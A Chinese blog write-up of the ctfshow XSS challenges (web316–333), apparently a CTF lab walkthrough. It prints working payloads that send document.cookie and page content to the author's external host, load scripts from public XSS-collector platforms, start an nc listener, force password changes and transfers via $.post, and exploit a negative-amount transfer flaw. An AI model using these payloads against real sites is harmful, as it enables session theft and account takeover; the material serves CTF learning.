ctfshow之xss(有图易操作)

XSS平台

document.cookie 获取饼干的js代码
推荐xss平台:http://xsscom.com/ , https://xss.pt/

JavaScript的 document.cookie 将以字符串的方式返回所有的cookie,类型格式: cookie1=value; cookie2=value; cookie3=value;

2021-08-06

web316(反射型)

利用xss平台里的代码进行攻击: http://xsscom.com/

建造完项目以后,复制代码:

<script src=http://xsscom.com//Y9GOjn>

利用的就是让点击的人的去触发恶意的连接,这里利用的是一个图片标签,原理就是然客户端去请求这个网站,顺带着也就吧cookie给带出来了

web317、318、319

317过滤了script
318过滤了img

换一个代码标签将继续插

web320、321、322——过滤空格

可用tab绕过,或者/代替

web323、324、325、326

过滤了iframe
<body/onload=document.location='http://ssjsj.ak6666.top:20002/?cookie='+document.cookie;>
输入后服务器开启监 nc -lvp 20002(bot会每隔一段时间访问输入的内容)
看监听到的内容会有flag

web327(储存型xss)

web328

再注册的地方xss进去会抓到admin的cookie,然后点击用户管理会出现api被调用,将所有抓到的包都修改cookie后可以越权成功!

payload:

<script>window.open('http://ssjsj.ak6666.top:20003/'+document.cookie)</script>

image-20210807131443722

web329

强于web328原因:cookie在被拦截到的时候已经是失效的了,所以盗用cookie将是不可行的方法

payload

<script>window.open('http://ssjsj.ak6666.top:20003/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

通过document.getElementsByClassName(‘layui-table-cell laytable-cell-1-0-1’)[1].innerHTML获取到指定的内容,

getElementsByClassName:获取所有指定类名的元素

还有innerHTML和outerHTML的区别
1)innerHTML:
  从对象的起始位置到终止位置的全部内容,不包括Html标签。
2)outerHTML:
  除了包含innerHTML的全部内容外, 还包含对象标签本身。

这样就可以得触发js事件,来得到想要的内容,机器人可能有点懒,不知道我的为什么老是触发不了

web330

此题是根据上一题的change.php来猜测出具有改密码功能

所以利用此功能来实现csrf类似的攻击,payload:

<script>window.open("http://127.0.0.1/api/change.php?p=a")</script>

非预期:获取页面源码,用document.querySelector获取,获取的类是div.layui-container,

获取文档中 id=“demo” 的元素:
document.querySelector("#demo");

<script>window.open('http://domain+port/'+document.querySelector('#top > div.layui-container').textContent)</script>

web331

修改密码功能为post传参修改

<script>$.post("http://api/change.php",{p:123123},"json");</script>

web332

其一存在逻辑漏洞,需要你的密码一定要大于6位数,不然转账是不会成功的,利用负负得正的原理,这样转账-99999再转账-999999999就是正整数了

web333

利用admin账户给自己转账:

<script>$.post("http://127.0.0.1/api/amount.php",{'u':'ad' ,'a':10000},"json");</script>

  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yn8rt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值